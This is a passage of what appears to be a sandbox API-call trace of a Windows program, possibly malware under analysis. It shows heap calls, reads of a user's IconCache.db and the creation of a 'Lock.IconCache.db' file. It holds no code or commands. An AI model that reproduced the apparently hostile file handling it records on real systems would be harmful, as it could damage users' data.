hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0242.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0242.910] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.910] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0242.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0242.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0242.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0242.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0242.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0242.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0242.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0242.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0242.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0242.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0242.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0242.913] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0242.913] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.918] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.920] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.922] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.925] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.927] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.929] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.930] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.935] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.936] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.938] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.939] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.942] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.943] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.945] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.946] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0242.977] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0242.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0242.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x37c0020 [0242.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0242.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x37c0020 | out: hHeap=0x25c0000) returned 1 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0243.000] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0243.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0243.000] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0243.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0243.001] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0243.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0243.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0243.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x37c0020 [0243.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0243.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0243.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0243.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0243.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0243.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0243.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x3dc0020 [0243.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0243.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0243.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0243.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0243.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0243.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0243.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0243.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0243.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0243.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0243.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.012] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0243.012] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0243.012] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0243.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0243.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0243.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0243.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0243.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0243.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0243.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0243.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0243.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 